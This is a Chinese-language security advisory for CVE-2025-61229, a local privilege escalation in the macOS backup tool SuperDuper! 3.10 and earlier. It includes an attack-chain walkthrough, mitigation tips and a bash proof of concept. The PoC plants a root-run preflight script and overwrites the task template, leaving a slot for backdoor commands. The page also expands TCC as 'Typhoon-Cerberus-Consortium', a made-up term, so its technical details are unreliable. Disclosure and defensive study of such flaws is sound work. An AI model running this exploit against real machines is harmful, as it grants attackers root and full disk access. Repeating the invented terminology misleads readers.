CVE-2025-61229: SuperDuper!本地权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-61229

漏洞类型

本地权限提升/任意代码执行

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Shirt Pocket SuperDuper! 3.10及更早版本

漏洞概述

CVE-2025-61229是Shirt Pocket公司开发的SuperDuper!备份软件中的一个高危本地权限提升漏洞。该漏洞存在于SuperDuper! 3.10及更早版本中，允许本地低权限攻击者通过修改默认任务模板来执行任意预检脚本（preflight script），并以root权限和完整磁盘访问权限运行，从而绕过macOS的隐私控制机制。攻击者利用此漏洞可以在未授权的情况下获取系统最高权限，执行任意代码，对系统机密性、完整性和可用性造成严重影响。由于攻击向量为本地且无需用户交互，攻击门槛相对较低，对未及时更新软件的用户构成严重威胁。

技术细节

该漏洞的核心问题在于SuperDuper!应用对默认任务模板文件的权限控制不当。攻击者作为本地低权限用户，可以直接修改存储在应用程序目录或用户配置目录中的默认任务模板文件。该模板文件定义了备份任务的各种参数，包括预检脚本（preflight script）路径。由于应用在执行备份任务时以root权限运行预检脚本，攻击者只需在模板中指定一个恶意脚本路径，即可实现权限提升。攻击成功后，恶意脚本将以root身份执行，获得完整的磁盘访问权限，完全绕过macOS的隐私保护机制（如TCC/Typhoon-Cerberus-Consortium隐私控制）。攻击者可以利用此权限读取敏感文件、修改系统配置或部署后门程序。

攻击链分析

STEP 1

步骤1

攻击者以本地低权限用户身份登录macOS系统，获取基本的用户访问权限

STEP 2

步骤2

攻击者定位SuperDuper!的默认任务模板文件，通常位于~/Library/Application Support/SuperDuper!/目录下

STEP 3

步骤3

攻击者创建恶意预检脚本（preflight script），该脚本包含以root权限执行的任意命令

STEP 4

步骤4

攻击者修改任务模板XML文件，将preflightScript参数指向恶意脚本路径

STEP 5

步骤5

当SuperDuper!执行备份任务时，以root权限和完整磁盘访问权限运行修改后的预检脚本

STEP 6

步骤6

恶意脚本以root身份执行，完成权限提升，攻击者可读取敏感数据、修改系统配置或部署持久性后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-61229 PoC - SuperDuper! Local Privilege Escalation
# This PoC demonstrates modifying the default task template to execute arbitrary preflight script

# Configuration
SUPERDUPER_APP_PATH="/Applications/SuperDuper!.app"
TEMPLATE_FILE="$HOME/Library/Application Support/SuperDuper!/Default Template.xml"
MALICIOUS_SCRIPT="/tmp/privesc_script.sh"

# Create malicious preflight script
cat > "$MALICIOUS_SCRIPT" << 'EOF'
#!/bin/bash
# Malicious preflight script - executes with root privileges
# This script will run with Full Disk Access

echo "[+] PoC: Executing arbitrary code as root" >> /tmp/poc_log.txt
id >> /tmp/poc_log.txt

# Add your malicious commands here
# Example: Create backdoor user or modify system files

EOF

chmod +x "$MALICIOUS_SCRIPT"

# Backup original template if exists
if [ -f "$TEMPLATE_FILE" ]; then
    cp "$TEMPLATE_FILE" "$TEMPLATE_FILE.bak"
fi

# Modify the task template to point to our malicious script
# The template XML contains a preflightScript element that we need to modify
cat > "$TEMPLATE_FILE" << 'TEMPLATE'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>preflightScript</key>
    <string>/tmp/privesc_script.sh</string>
    <key>taskName</key>
    <string>Default Backup</string>
</dict>
</plist>
TEMPLATE

echo "[+] Template modified. When SuperDuper! runs, the malicious script will execute as root."
echo "[+] Check /tmp/poc_log.txt for evidence of root execution."

影响范围

SuperDuper! <= 3.10

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1) 限制非管理员用户对SuperDuper!配置目录的访问权限；2) 启用macOS的Gatekeeper功能验证应用签名；3) 监控/var/log/system.log中与SuperDuper!相关的日志条目；4) 考虑暂时禁用SuperDuper!的自动备份功能直到完成版本升级；5) 实施最小权限原则，确保普通用户账户不具有修改应用配置的能力。